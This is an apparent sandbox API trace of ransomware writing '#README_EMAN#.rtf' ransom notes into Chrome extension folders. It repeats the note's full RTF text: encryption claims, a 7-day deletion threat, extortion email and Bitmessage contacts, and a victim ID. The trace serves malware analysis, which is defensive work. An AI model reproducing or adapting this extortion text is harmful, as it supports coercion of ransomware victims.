safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0287.030] WriteFile (in: hFile=0x2f0, lpBuffer=0x2462bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.031] CloseHandle (hObject=0x2f0) returned 1 [0287.031] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0287.031] GetLastError () returned 0x2 [0287.031] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0287.032] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.032] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.032] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no 